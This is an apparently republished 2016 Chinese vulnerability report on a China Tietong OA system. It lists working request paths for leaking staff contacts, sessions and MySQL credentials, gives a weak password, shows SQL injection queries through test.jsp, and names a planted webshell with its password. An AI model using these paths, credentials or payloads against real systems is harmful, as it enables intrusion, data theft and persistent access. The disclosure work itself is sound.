首页 > 安全 > 网站安全 >

中国铁通某系统敏感信息职工联系方式泄露/无需登陆getshell

2016-01-18

中国铁通某系统敏感信息职工联系方式泄露+session泄露+弱口令+mysql密码泄露+多个sql注入点+绝对路径泄露+无需登陆getshell+内网服务器已登 2 1敏感信息职工联系方式泄露http: ** ** ** **:6

中国铁通某系统敏感信息职工联系方式泄露+session泄露+弱口令+mysql密码泄露+多个sql注入点+绝对路径泄露+无需登陆getshell+内网服务器已登#2

QQ截图20151129165936.png



#1敏感信息职工联系方式泄露

http://**.**.**.**:6789/yyoa/assess/js/initDataAssess.jsp

http://**.**.**.**:6789/yyoa/common/selectPersonNew/initData.jsp?trueName=1

QQ截图20151129165953.png


QQ截图20151129170025.png



#2session泄露

http://**.**.**.**:6789/yyoa/ext/https/getSessionList.jsp?cmd=getAll

QQ截图20151129170227.png



#3mysql密码泄露

http://**.**.**.**:6789/yyoa/createMysql.jsp

QQ截图20151129170237.png



#3弱口令

hchun 123456

QQ截图20151129165841.png


QQ截图20151129170304.png


QQ截图20151129170436.png



#4查看数据库

http://**.**.**.**:6789/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database()

QQ截图20151129170707.png



#5多个sql注入点

http://**.**.**.**:6789/yyoa/common/selectPersonNew/initData.jsp?trueName=1

http://**.**.**.**:6789/yyoa/checkWaitdo.jsp?userID=1

http://**.**.**.**:6789/yyoa/common/js/menu/test.jsp?doType=101&S1=*



手工证明DBA权限

http://**.**.**.**:6789/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20user()

QQ截图20151129170720.png



#6绝对路径泄露

http://**.**.**.**:6789/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir

QQ截图20151129170729.png



#7无需登陆getshell

http://**.**.**.**:6789/yyoa/zhengkai.jsp

kai

QQ截图20151129170857.png



#8内网服务器登录

太卡了

随便截一张图

QQ截图20151129171443.png

解决方案:

修复。

相关文章
最新文章
热点推荐